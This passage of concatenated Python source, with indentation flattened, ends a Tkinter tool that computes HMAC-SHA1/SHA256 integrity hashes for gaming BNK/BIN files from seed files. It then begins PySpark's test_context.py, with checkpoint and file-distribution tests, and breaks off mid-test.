except KeyboardInterrupt:
logging.debug("Keyboard interrupt during processing of files. Exiting")
#sys.exit(1)
return -1
except FileNotFoundError:
logging.error("Could not read file: " + fname)
return oh # { 'oh': oh } , 'cache_dict' : self.cache_dict, 'rv': self.LogOutput ,'filename' : fname}
# Inserts spaces on [text] for every [s_range]
def insert_spaces(self, text, s_range):
return " ".join(text[i:i+s_range] for i in range(0, len(text), s_range))
# Formats inputstr based on options_d dictionary
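# Illustrative example (hypothetical values): with options_d of
#   {'selectedHashtype': 'HMAC-SHA1', 'eightchar': True, 'uppercase': True, 'reverse': False}
# an input hash is stripped of any leading '0x', zero-filled to 40 hex chars,
# split into blocks of eight characters and upper-cased.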
def format_output(self, inputstr, options_d):
outputstr = ''
if options_d['selectedHashtype'] == 'HMAC-SHA1':
outputstr = inputstr.lstrip('0X').lstrip('0x').zfill(40) #strip 0x first
elif options_d['selectedHashtype'] == 'HMAC-SHA256':
outputstr = inputstr.lstrip('0X').lstrip('0x').zfill(64) #strip 0x first
# include a space for every eight chars
if (options_d['eightchar'] == True):
s_range = 8
outputstr = " ".join(outputstr[i:i+s_range] for i in range(0, len(outputstr), s_range)) # self.insert_spaces(inputstr, 8)
# uppercase
if options_d['uppercase'] == True:
outputstr = outputstr.upper()
# QCAS expected result
if options_d['reverse'] == True:
outputstr = epsig2.getQCAS_Expected_output(self, outputstr)
return outputstr
def getQCAS_Expected_output(self, text):
tmpstr = text[:8] # Returns from the beginning to position 8 of uppercase text
return "".join(reversed([tmpstr[i:i+2] for i in range(0, len(tmpstr), 2)]))
def processfile(self,chunks=8192):
# time.sleep(1)
fname=self.filepath
h = None
do_output = None
if fname:
future = list()
if fname.upper().endswith(".BNK"):
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
future.append(executor.submit(self.dobnk, fname, chunks))
# h = self.dobnk(fname, chunks)
#elif fname.upper().endswith(".BIN"):
else:
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
future.append(executor.submit(self.dobin, fname, chunks))
# h = self.dobin(fname, chunks)
#else:
# logging.error("unknown file type selected: " + fname)
# messagebox.showerror("Invalid files selected", "Please select either .BNK or .BIN files only")
# return
for x in as_completed(future):
# time.sleep(1)
h = x.result()
if h == -1:
return # handle error in seed input
else:
# self.text_BNKoutput.insert(END, "%-50s\t%s\n" % (str(h).zfill(40), "RAW output"))
# raw_outputstr = "%-50s\t%s" % (str(h).zfill(40), "RAW output")
# logging.debug(raw_outputstr + "\t[" + str(threading.currentThread().getName()) + "]")
# self.output.append(raw_outputstr)
####
# processfile must occur before any reads to self.xor_result!!
self.xor_result = h
####
outputstr = "%-50s" % (str(self.format_output(str(h), self.options_d)))
if fname.upper().endswith(".BNK"):
logging.debug(outputstr + "\tXOR Formatted Result" + "\t [" + str(threading.currentThread().getName()) + "]")
else:
logging.debug(outputstr + "\tFormatted Result" + "\t [" + str(threading.currentThread().getName()) + "]")
class Seed():
def __init__(self, seed, hash_type):
self.hash_type = hash_type
valid_hash_types = ['HMAC-SHA256', 'HMAC-SHA1']
if hash_type in valid_hash_types:
self.seed = self.getSeed(seed)
logging.warning("Seed Modifed to: " + self.seed)
else:
self.seed = None
logging.error("Unsupported hash type: " + str(hash_type))  # returning -1 from __init__ would raise TypeError
def getSeed(self, s):
output_str = ''
# need to append '0' to include appropriate length
if self.hash_type == 'HMAC-SHA256' and len(s) < 64:
# append
output_str = s.ljust(64, '0')
elif self.hash_type == 'HMAC-SHA1' and len(s) < 40:
output_str = s.ljust(40, '0')
elif self.hash_type == 'HMAC-SHA256' and len(s) > 64:
# truncate
output_str = s[:64]
elif self.hash_type == 'HMAC-SHA1' and len(s) > 40:
output_str = s[:40]
else:
return s
return output_str
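# Illustrative example (hypothetical seed value): Seed('1234', 'HMAC-SHA1').seed
# is left-justified and padded with '0' to 40 chars ('1234' + '0' * 36), while a
# seed longer than 40 chars under 'HMAC-SHA1' is truncated to its first 40 chars.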
class epsig2_gui(threading.Thread):
# Constructor
def __init__(self):
logging.basicConfig(level=logging.DEBUG, format=' %(asctime)s - %(levelname)s- %(message)s')
logging.debug('Start of epsig2_gui')
self.bnk_filename = ''
self.filepath = ''
self.seed_filepath = ''
self.bnk_filename_list = list()
self.filelist = list()
self.user_cache_file = None
self.cache_dict = {} # Clear cache_dict
self.root = Tk()
self.selectedHashtype = StringVar()
self.seed = None
Thread(self.setupGUI()).start()
def writetoLogfile(self, filename, epsig2_p, bnkfile, multi_logf):
timestamp = datetime.timestamp(datetime.now())
outputfile = ''
#if self.logtimestamp.get() == 1: # Multi log files not overwritten saved in different directory
if multi_logf == True:
outputfile = "epsig2-logs/" + filename[:-4] + "-" + str(timestamp) + ".log"
else: # Single log file that's overwritten
outputfile = filename
with open(outputfile, 'a+') as outfile:
outfile.writelines("#--8<-----------GENERATED: " +
str(datetime.fromtimestamp(timestamp)) + " --------------------------\n")
outfile.writelines("Processsed: " + bnkfile + "\n")
# outfile.writelines("%40s \t %40s \t %60s\n" % ("SEED", "HASH", "FILENAME"))
my_seed = ''
outfile.writelines("%-40s \t %-40s \t %-60s\n" % ("Seed", "Hash", "Filename"))
for item in epsig2_p.LogOutput:
outfile.writelines("%40s \t %40s \t %-60s\n" % (epsig2.format_output(self, str(item['seed']), self.gui_getOptions()),
epsig2.format_output(self, str(item['hash']), self.gui_getOptions()), item['filename']))
my_seed = str(item['seed'])
if epsig2_p.filepath.upper().endswith('.BNK'):
outfile.writelines("%40s \t %40s \t XOR\n" % (epsig2.format_output(self, my_seed, self.gui_getOptions()),
epsig2.format_output(self, epsig2_p.xor_result.replace(" ", ""), self.gui_getOptions())))
else:
outfile.writelines("%40s \t %40s \t Formatted Output\n" % (epsig2.format_output(self, my_seed, self.gui_getOptions()),
epsig2.format_output(self, epsig2_p.xor_result.replace(" ", ""), self.gui_getOptions())))
# Returns flipped bits of full length
def getClubsQSIM_Expected_output(self, text):
return "".join(reversed([text[i:i+2] for i in range(0, len(text), 2)]))
# Generates the Seed object every time the "start" button is pressed.
def GetSeedText(self):
tmp_seed = ''
# reverse the seed.
if (self.reverse.get() == 1):
tmp_seed = epsig2.getQCAS_Expected_output(self, self.combobox_SelectSeed.get())
else:
tmp_seed = self.combobox_SelectSeed.get()
self.seed = Seed(tmp_seed, self.selectedHashtype.get())
logging.warning("Seed Modifed to: " + self.seed.seed)
def gui_getOptions(self):
options_d = dict()
options_d['cache_file_f'] = self.useCacheFile.get() == 1
options_d['uppercase'] = self.uppercase.get() == 1
options_d['eightchar'] = self.eightchar.get() == 1
options_d['reverse'] = self.reverse.get() == 1
options_d['usr_cache_file'] = self.CacheFileButtonText.get()
options_d['selectedHashtype'] = self.selectedHashtype.get()
return options_d
# refer: https://stackoverflow.com/questions/38987/how-do-i-merge-two-dictionaries-in-a-single-expression
def merge_two_dicts(self, x, y):
z = x.copy() # start with x's keys and values
z.update(y) # modifies z with y's keys and values & returns None
return z
def updateGUI(self, epsig2_process):
# update main text area window
# def format_output(self, inputstr, options_d):
if epsig2_process.filepath:
if epsig2_process.filepath.upper().endswith('.BNK'):
# Display Filename to be processed
self.text_BNKoutput.insert(END, "\nProcessing: " + epsig2_process.filepath + "\n")
# Display BNK details
for hash_result in epsig2_process.LogOutput:
# bnk_details_hash_output = hash_result['seed'] + "\t" + hash_result['hash'] + "\t" + hash_result['filename']
seed_str = epsig2.format_output(self, hash_result['seed'], self.gui_getOptions())
hash_str = epsig2.format_output(self, hash_result['hash'], self.gui_getOptions())
bnk_details_hash_output = seed_str + "\t" + hash_str + "\t" + hash_result['filename']
self.text_BNKoutput.insert(END, bnk_details_hash_output + "\n")
self.text_BNKoutput.insert(END, "XOR Result: " + "\n")
else:
self.text_BNKoutput.insert(END, "Formatted Result: " + "\n")
else:
self.text_BNKoutput.insert(END, "Invalid file - error in file/filename format.\n")
# Format seed and XOR/Formatted Result
seed_output = epsig2.format_output(self, self.seed.seed, self.gui_getOptions())
str_output = epsig2.format_output(self, epsig2_process.xor_result, self.gui_getOptions())
if epsig2_process.filepath:
self.text_BNKoutput.insert(END, seed_output + "\t" + str_output + "\t" + os.path.basename(epsig2_process.filepath) + "\n")
def startEpsig2GUI(self, filepath):
#futures = list()
#pool = ThreadPoolExecutor(len(self.filelist)) # one thread per file
self.bnk_filename = os.path.basename(filepath)
self.mandir = os.path.dirname(filepath)
self.GetSeedText()
if (self.clubs_expected_output.get() == 1):
message = "\nQSIM reversed seed to use: " + self.getClubsQSIM_Expected_output(self.seed.seed) + "\n"
logging.info(message)
self.text_BNKoutput.insert(END, message)
logging.info("Seed is: " + self.seed.seed + " length is: " + str(len(self.seed.seed)))
# create process for hashing a file
my_p = epsig2(self.seed.seed, filepath, self.gui_getOptions(), self.cache_dict, str(self.selectedHashtype.get()))
#futures.append(pool.submit(my_p.processfile, filepath, MAXIMUM_BLOCKSIZE_TO_READ)) # add processs to threadpool
my_p.processfile()
# update dict()
self.cache_dict = self.merge_two_dicts(self.cache_dict, my_p.cache_dict)
self.updateGUI(my_p)
# def writetoLogfile(self, filename, xor_result, bnkfile, multi_logf):
if self.writetolog.get() == 1 and my_p.filepath:
self.writetoLogfile(EPSIG_LOGFILE, my_p, filepath, self.logtimestamp.get() == 1)
# Create and launch a thread
# t = Thread(group=None, target=my_p.processfile, name=self.bnk_filename, args=(filepath, MAXIMUM_BLOCKSIZE_TO_READ, ))
# t.start()
# xor_result = self.processfile(filepath, MAXIMUM_BLOCKSIZE_TO_READ)
def handleButtonPress(self, myButtonPress):
if myButtonPress == '__selected_bnk_file__':
if (os.name == 'nt'): # Windows OS
tmp = filedialog.askopenfilenames(initialdir='G:/OLGR-TECHSERV/BINIMAGE')
elif (os.name == 'posix'): # Linux OS
tmp = filedialog.askopenfilenames(initialdir='.')
else:
tmp = filedialog.askopenfilenames(initialdir='.')
if tmp:
self.textfield_SelectedBNK.delete(0, END)
self.filelist = tmp
for fname in self.filelist:
fname_basename = os.path.basename(fname)
self.bnk_filename_list.append(fname_basename)
self.textfield_SelectedBNK.insert(0, fname_basename + "; ")
if not epsig2.verifyFileExists(self, fname):
msg = "**** ERROR: " + fname + " cannot be read check contents"
self.text_BNKoutput.insert(END, msg)
logging.error(msg)
elif myButtonPress == '__start__':
if len(self.filelist) > 0:
for filepath in self.filelist:
logging.info("Processing: " + filepath)
if (os.path.isfile(filepath)):
self.startEpsig2GUI(filepath)
else:
logging.warning(filepath + " does not exist")
messagebox.showerror(filepath + " does not exist", "Error in file selection")
else:
# try reading the text box if the file exists:
tmp_fname = self.textfield_SelectedBNK.get()
if os.path.isfile(tmp_fname):
self.startEpsig2GUI(tmp_fname)
else:
messagebox.showerror("BNK files not selected.", "Please select files first")
logging.error(str(len(self.filelist)))
elif myButtonPress == '__clear_output__':
self.text_BNKoutput.delete(1.0, END)
elif myButtonPress == '__clear__':
self.text_BNKoutput.delete(1.0, END)
self.cb_reverse.deselect()
self.filepath = ''
self.bnk_filename = ''
self.textfield_SelectedBNK.delete(0, END)
self.reverse.set(0)
self.mslcheck.set(0)
self.cb_uppercase.deselect()
self.cb_mslcheck.deselect()
self.uppercase.set(1)
self.eightchar.set(0)
self.cb_eightchar.deselect()
self.writetolog.set(0)
self.logtimestamp.set(0)
self.clubs_expected_output.set(0)
self.label_SeedPath.configure(text=DEFAULT_STR_LBL_SEED_FILE)
self.combobox_SelectSeed.set('0000000000000000000000000000000000000000')
self.combobox_SelectSeed['values'] = ()
self.bnk_filename_list = list()
self.filelist = list()
self.useCacheFile.set(1)
self.CacheFileButtonText.set(DEFAULT_CACHE_FILE)
self.user_cache_file = None
self.selectedHashtype.set("HMAC-SHA1")
elif myButtonPress == '__clear_cache__':
if self.user_cache_file:
cache_location = self.user_cache_file
else:
cache_location = DEFAULT_CACHE_FILE
if self.useCacheFile.get() == 1: # Use Cache File
cache_file = CacheFile(self.user_cache_file) # read cache file
cache_file.clearFile() # clear file cache
self.cache_dict = cache_file.cache_dict # Overwrite self.cache_dict with contents of file
else:
self.cache_dict = {} # empty_cache_data # Clear cache_dict
elif myButtonPress == '__print_cache__':
self.text_BNKoutput.insert(END, "\nCache Entries: ")
if self.useCacheFile.get() == 1: # Use Cache File
cache_file = CacheFile(self.CacheFileButtonText.get())
self.cache_dict = cache_file.cache_dict # Overwrite self.cache_dict with contents of file
message = json.dumps(self.cache_dict, sort_keys=True, indent=4, separators=(',',':'))
self.text_BNKoutput.insert(END, message + "\n")
elif myButtonPress == '__select_cache_file__':
input_cachefile_dir = filedialog.askdirectory(initialdir='.', title='Select Directory to save cache file...')
self.CacheFileButtonText.set(os.path.join(input_cachefile_dir,os.path.basename(DEFAULT_CACHE_FILE)))
self.user_cache_file = self.CacheFileButtonText.get()
elif myButtonPress == '__selected_seed_file__':
if (os.name == 'nt'): # Windows OS
if (self.mslcheck.get() == 1): # Handle MSL file option for QCAS datafiles
tmp = filedialog.askopenfile(initialdir=r'G:\OLGR-TECHSERV\MISC\BINIMAGE\qcas')
else:
tmp = filedialog.askopenfile(initialdir=r'S:\cogsp\docs\data_req\download\master') # put S:\ dir here.
elif (os.name == 'posix'): # Linux OS (my dev box)
tmp = filedialog.askopenfile(initialdir='.')
else:
tmp = filedialog.askopenfile(initialdir='.')
if tmp: # Selected something
self.seed_filepath = tmp.name
self.getComboBoxValues(self.seed_filepath)
# Generate Year and Date based on numbers extracted
sl1date = datetime.strptime(self.sl1_year + "/" + self.sl1_month, "%Y/%m")
self.label_SeedPath.configure(text="Seed File: " + sl1date.strftime("(%b %Y)") + ": " + self.seed_filepath)
def processsl1file(self, fname):
seedlist = ()
with open(fname,'r') as sl1file:
sl1entry = csv.reader(sl1file, delimiter=',')
try:
# Select the Columns we want - index starts at 0
included_cols = [2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32]
for row in sl1entry:
seedlist = list(row[i] for i in included_cols) # create a list with only the columns we need
self.sl1_year = row[0] # extract year
self.sl1_month = row[1] # extract month
except csv.Error as e:
sys.exit('file %s, line %d: %s' % (fname, sl1entry.line_num, e))
return seedlist
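# Illustrative sketch of the expected SL1/MSL row layout (an assumption based on the
# column indices above): column 0 holds the year, column 1 the month, and columns
# 2-32 hold the seeds, e.g.
#
#   2019,05,<seed for day 1>,<seed for day 2>,...,<seed for day 31>
#
# so processsl1file() returns the 31 seed columns and records sl1_year/sl1_month.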
def getComboBoxValues(self, fname):
if (os.path.isfile(fname)):
self.combobox_SelectSeed['values'] = self.processsl1file(fname)
else:
messagebox.showerror("Expected SL1 or MSL file to Process", fname + " is not a valid seed file")
def aboutwindow(self):
about_script = "Version: v" + VERSION + " by aceretjr\n Python3 script for processing BNK and BIN files."
messagebox.showinfo("About This Script", about_script)
def SelectHashType(self, value):
self.selectedHashtype.set(value)
def seed_selection(self):
print(self.box_value.get())
def setupGUI(self):
self.root.wm_title("epsig2 BNK/BIN file hashing tool v" + VERSION)
self.root.resizable(1,1)
menubar = tk.Menu(self.root)
filemenu = tk.Menu(menubar, tearoff=0)
#optionmenu = tk.Menu(menubar, tearoff=1)
helpmenu = tk.Menu(menubar, tearoff=0)
menubar.add_cascade(label="File", menu=filemenu)
# menubar.add_cascade(label="Option", menu=optionmenu)
menubar.add_cascade(label="Help", menu=helpmenu)
filemenu.add_command(label="Exit", command=self.root.destroy)
helpmenu.add_command(label="About...", command=self.aboutwindow)
#optionmenu.add_command(label="Preferences...", command=self.MenuBar_Config) # start this script now.
self.root.config(menu=menubar)
######## Top Frame
frame_toparea = ttk.Frame(self.root)
frame_toparea.pack(side = TOP, fill=X, expand=False)
frame_toparea.config(relief = None, borderwidth = 2)
frame_toparea2 = ttk.Frame(frame_toparea)
frame_toparea2.pack(side = TOP, fill=X, expand=False)
frame_toparea2.config(relief = None, borderwidth = 2)
ttk.Label(frame_toparea2, justify=LEFT,
text = 'GUI script to process BNK/BIN files (Supports only HMAC-SHA1/HMAC-SHA256) - Please Select: ').pack(side=LEFT, padx=3, pady=3, fill=Y, expand=False, anchor='w')
self.selectedHashtype = StringVar()
optionMenuHashType = OptionMenu(frame_toparea2, self.selectedHashtype, 'HMAC-SHA1', 'HMAC-SHA256', command=self.SelectHashType).pack(side=LEFT, padx=3, pady=3, fill=X, expand=False, anchor='w')
self.selectedHashtype.set("HMAC-SHA1")
######## BNK Selection Frame
frame_bnkSelectionFrame = ttk.Frame(frame_toparea)
frame_bnkSelectionFrame.config(relief = RIDGE, borderwidth = 2)
frame_bnkSelectionFrame.pack(side = TOP, padx = 3, pady = 3, expand = False, fill=X, anchor = 'w')
button_SelectedBNKfile = ttk.Button(frame_bnkSelectionFrame, text = "Select BNK/BIN file...", width=20,
command = lambda: self.handleButtonPress('__selected_bnk_file__'))
button_SelectedBNKfile.pack(side=LEFT, padx = 3, pady = 3, fill=X, expand=False)
# Text Entry Selected BNK file
self.textfield_SelectedBNK = ttk.Entry(frame_bnkSelectionFrame, width = 120)
self.textfield_SelectedBNK.pack(side=LEFT, fill=X, padx = 3, pady = 3, expand=True)
########### Seed Frame Area
frame_SeedFrame = ttk.Frame(frame_toparea)
frame_SeedFrame.config(relief = RIDGE, borderwidth = 2)
frame_SeedFrame.pack(side=TOP, fill=X, padx = 3, pady = 3, expand=True)
frame_SelectSeed = ttk.Frame(frame_toparea)
frame_SelectSeed.config(relief= None, borderwidth = 2)
frame_SelectSeed.pack(side=TOP, fill=X, padx = 3, pady = 3, expand=True)
# Button Selected Seed file (sl1)
button_Selectedsl1file = ttk.Button(frame_SeedFrame,
text = "Seed or SL1/MSL file...", width = 20,
command = lambda: self.handleButtonPress('__selected_seed_file__'))
button_Selectedsl1file.pack(side=LEFT, fill=X, padx = 3, pady = 3, expand=False)
# Combo Box for Seeds, default to 0x00
self.box_value = StringVar()
self.combobox_SelectSeed = ttk.Combobox(frame_SeedFrame,
justify=LEFT,
textvariable=self.box_value,
# command=self.seed_selection,
width = 70)
self.combobox_SelectSeed.pack(side=LEFT, fill=X, padx = 3, pady = 3, expand=True)
self.combobox_SelectSeed.set('0000000000000000000000000000000000000000')
# Checkbutton MSL file (casinos)
self.mslcheck = IntVar()
self.mslcheck.set(0)
self.cb_mslcheck = Checkbutton(frame_SeedFrame,
text="MSL (Use Casino MSL File)",
justify=LEFT,
variable = self.mslcheck,
onvalue=1,
offvalue=0)
self.cb_mslcheck.pack(side=LEFT, fill=X, padx = 3, pady = 3, expand=False)
# Text Label sl1 location
self.label_SeedPath = ttk.Label(frame_toparea,
text = DEFAULT_STR_LBL_SEED_FILE, width = 80)
self.label_SeedPath.pack(side=BOTTOM, fill=X, padx = 3, pady = 3, expand=True)
######################### MIDDLE FRAME
frame_middleframe = ttk.Frame(self.root)
frame_middleframe.pack(side = TOP, fill=BOTH, expand=True)
# Need to use .pack() for scrollbar and text widget
frame_textarea = ttk.Labelframe(frame_middleframe, text="Output Field")
frame_textarea.pack(side = LEFT, fill=BOTH, expand=True)
frame_textarea.config(relief = RIDGE, borderwidth = 2)
# Text Area output of BNK file generation
self.text_BNKoutput = Text(frame_textarea, height=25, width =80)
myscrollbar = Scrollbar(frame_textarea, command=self.text_BNKoutput.yview)
myscrollbar.pack(side=RIGHT, fill=Y)
self.text_BNKoutput.configure(yscrollcommand=myscrollbar.set)
self.text_BNKoutput.pack(side=LEFT, fill=BOTH, expand=True)
#Frame for Checkbuttons
frame_checkbuttons = ttk.Labelframe(frame_middleframe, text="Output Options")
frame_checkbuttons.pack(side = RIGHT, fill=Y, expand = False)
frame_checkbuttons.config(relief = RIDGE, borderwidth = 2)
# Checkbutton Reverse
self.reverse = IntVar()
self.reverse.set(0)
self.cb_reverse = Checkbutton(
frame_checkbuttons,
text="QCAS expected output",
justify=LEFT,
variable = self.reverse,
onvalue=1,
offvalue=0)
self.cb_reverse.grid(row=1, column=1, sticky='w')
# Checkbutton QSIM expected Seed
self.clubs_expected_output = IntVar()
self.clubs_expected_output.set(0)
self.cb_clubs_expected_output = Checkbutton(
frame_checkbuttons,
text="Display QSIM expected seed",
justify=LEFT,
variable = self.clubs_expected_output,
onvalue=1,
offvalue=0)
self.cb_clubs_expected_output.grid(row=2, column=1, sticky='w')
# Checkbutton Uppercase
self.uppercase = IntVar()
self.uppercase.set(1)
self.cb_uppercase = Checkbutton(
frame_checkbuttons,
text="Uppercase",
justify=LEFT,
variable = self.uppercase,
onvalue=1,
offvalue=0)
self.cb_uppercase.grid(row=3, column=1, sticky='w')
# Checkbutton 8 Char
self.eightchar = IntVar()
self.eightchar.set(0)
self.cb_eightchar = Checkbutton(
frame_checkbuttons,
text="8 character spacing",
justify=LEFT,
variable = self.eightchar,
onvalue=1,
offvalue=0)
self.cb_eightchar.grid(row=4, column=1, sticky='w',)
# Checkbutton Write to Log
self.writetolog = IntVar()
self.writetolog.set(1)
self.cb_writetolog = Checkbutton(
frame_checkbuttons,
text="Log File: epsig2.log",
justify=LEFT,
variable = self.writetolog,
onvalue=1,
offvalue=0)
self.cb_writetolog.grid(row=5, column=1, sticky='w',)
# Timestamp logs
self.logtimestamp = IntVar()
self.logtimestamp.set(0)
self.cb_logtimestamp = Checkbutton(
frame_checkbuttons,
text="Multiple Log Files: epsig2-logs/",
justify=LEFT,
variable = self.logtimestamp,
onvalue=1,
offvalue=0)
self.cb_logtimestamp.grid(row=6, column=1, sticky='w',)
################ Bottom FRAME ##############
frame_bottombuttons = ttk.Frame(self.root)
frame_bottombuttons.pack(side=BOTTOM, fill=X, expand = False)
frame_bottombuttons.config(relief = None, borderwidth = 2)
################ Bottom Control FRAME ##############
frame_controlbuttons = ttk.Frame(frame_bottombuttons)
frame_controlbuttons.pack(side=TOP, fill=X, expand = True)
frame_controlbuttons.config(relief = RIDGE, borderwidth = 2)
# Clear Button
self.button_clear = ttk.Button(
frame_controlbuttons,
text = "Reset Form to Defaults",
command = lambda: self.handleButtonPress('__clear__'),
width = 20)
self.button_clear.grid(row=1, column = 1, padx=5, pady=5, sticky='w',)
# Clear Output
button_clear_output = ttk.Button(
frame_controlbuttons,
text = "Clear Output Field",
command = lambda: self.handleButtonPress('__clear_output__'),
width = 20)
button_clear_output.grid(row=1, column=2, sticky='w', padx=5, pady=5)
# Start Button
self.button_start = ttk.Button(
frame_controlbuttons,
text = "Generate Hash...",
command = lambda: self.handleButtonPress('__start__'),
width = 20)
self.button_start.grid(row=1, column=3, sticky='w', padx=5, pady=5)
################ Bottom Cache FRAME ##############
frame_cachebuttons = ttk.Frame(frame_bottombuttons)
frame_cachebuttons.pack(side=BOTTOM, fill=X, expand = True)
frame_cachebuttons.config(relief = RIDGE, borderwidth = 2)
# Print Cache Button
button_cache = ttk.Button(frame_cachebuttons,
text = "Print Cache",
command = lambda: self.handleButtonPress('__print_cache__'),
width = 20)
button_cache.grid(row=1, column=3, sticky='w', padx=5, pady=5)
# Clear Cache Button
self.button_clear_cache = ttk.Button(
frame_cachebuttons,
text = "Clear Cache",
command = lambda: self.handleButtonPress('__clear_cache__'),
width = 20)
self.button_clear_cache.grid(row=1, column=4, sticky='w', padx=5, pady=5)
# Checkbutton Use Cache File
self.useCacheFile = IntVar()
self.useCacheFile.set(1)
self.cb_useCacheFile = Checkbutton(
frame_cachebuttons,
text="Use File Cache:",
justify=LEFT,
variable = self.useCacheFile,
onvalue=1,
offvalue=0)
self.cb_useCacheFile.grid(row=1, column=1, sticky='w', padx=3, pady=3)
# Select Cache file button
self.CacheFileButtonText = StringVar()
self.CacheFileButtonText.set(DEFAULT_CACHE_FILE)
self.button_select_cache_button = ttk.Button(
frame_cachebuttons,
textvariable = self.CacheFileButtonText,
command = lambda: self.handleButtonPress('__select_cache_file__'))
self.button_select_cache_button.grid(row=1, column=2, sticky='w', padx=3, pady=3)
#if self.useCacheFile.get() == 1: # Use Cache File
# self.button_clear_cache.state(["disabled"])
# self.button_clear_cache.config(state=DISABLED)
# else:
# self.button_clear_cache.state(["!disabled"])
# self.button_clear_cache.config(state=not DISABLED)
self.root.mainloop()
def exit_handler():
logging.getLogger().info("==== epsig2_gui STOPPED/INTERRUPTED: " + str(datetime.now()) + " by: " + getpass.getuser() + " ====")
def main():
app = None
logging.basicConfig(level=logging.DEBUG, format=' %(asctime)s - %(levelname)s- %(message)s')
atexit.register(exit_handler)
try:
# app = epsig2_gui()
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
future = executor.submit(epsig2_gui)
except KeyboardInterrupt:
logging.debug("Program Exiting.")
app.root.quit()
sys.exit(0)
if __name__ == "__main__": main()
|
test_context.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import shutil
import stat
import tempfile
import threading
import time
import unittest
from collections import namedtuple
from pyspark import SparkConf, SparkFiles, SparkContext
from pyspark.testing.utils import ReusedPySparkTestCase, PySparkTestCase, QuietTest, SPARK_HOME
class CheckpointTests(ReusedPySparkTestCase):
def setUp(self):
self.checkpointDir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.checkpointDir.name)
self.sc.setCheckpointDir(self.checkpointDir.name)
def tearDown(self):
shutil.rmtree(self.checkpointDir.name)
def test_basic_checkpointing(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: range(1, x + 1))
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
result = flatMappedRDD.collect()
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.isCheckpointed())
self.assertEqual(flatMappedRDD.collect(), result)
self.assertEqual("file:" + self.checkpointDir.name,
os.path.dirname(os.path.dirname(flatMappedRDD.getCheckpointFile())))
def test_checkpoint_and_restore(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: [x])
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
flatMappedRDD.count() # forces a checkpoint to be computed
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.getCheckpointFile() is not None)
recovered = self.sc._checkpointFile(flatMappedRDD.getCheckpointFile(),
flatMappedRDD._jrdd_deserializer)
self.assertEqual([1, 2, 3, 4], recovered.collect())
class LocalCheckpointTests(ReusedPySparkTestCase):
def test_basic_localcheckpointing(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: range(1, x + 1))
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertFalse(flatMappedRDD.isLocallyCheckpointed())
flatMappedRDD.localCheckpoint()
result = flatMappedRDD.collect()
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.isLocallyCheckpointed())
self.assertEqual(flatMappedRDD.collect(), result)
class AddFileTests(PySparkTestCase):
def test_add_py_file(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this job fails due to `userlibrary` not being on the Python path:
# disable logging in log4j temporarily
def func(x):
from userlibrary import UserClass
return UserClass().hello()
with QuietTest(self.sc):
self.assertRaises(Exception, self.sc.parallelize(range(2)).map(func).first)
# Add the file, so the job should now succeed:
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
res = self.sc.parallelize(range(2)).map(func).first()
self.assertEqual("Hello World!", res)
def test_add_file_locally(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
self.sc.addFile(path)
download_path = SparkFiles.get("hello.txt")
self.assertNotEqual(path, download_path)
with open(download_path) as test_file:
self.assertEqual("Hello World!\n", test_file.readline())
def test_add_file_recursively_locally(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello")
self.sc.addFile(path, True)
download_path = SparkFiles.get("hello")
self.assertNotEqual(path, download_path)
with open(download_path + "/hello.txt") as test_file:
self.assertEqual("Hello World!\n", test_file.readline())
with open(download_path + "/sub_hello/sub_hello.txt") as test_file:
self.assertEqual("Sub Hello World!\n", test_file.readline())
def test_add_py_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlibrary import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
from userlibrary import UserClass
self.assertEqual("Hello World!", UserClass().hello())
def test_add_egg_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlib import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlib-0.1.zip")
self.sc.addPyFile(path)
from userlib import UserClass
self.assertEqual("Hello World from inside a package!", UserClass().hello())
def test_overwrite_system_module(self):
self.sc.addPyFile(os.path.join(SPARK_HOME, "python/test_support/SimpleHTTPServer.py"))
import SimpleHTTPServer
self.assertEqual("My Server", SimpleHTTPServer.__name__)
def func(x):
import SimpleHTTPServer
return SimpleHTTPServer.__name__
self.assertEqual(["My Server"], self.sc.parallelize(range(1)).map(func).collect())
class ContextTests(unittest.TestCase):
def test_failed_sparkcontext_creation(self):
# Regression test for SPARK-1550
self.assertRaises(Exception, lambda: SparkContext("an-invalid-master-name"))
def test_get_or_create(self):
with SparkContext.getOrCreate() as sc:
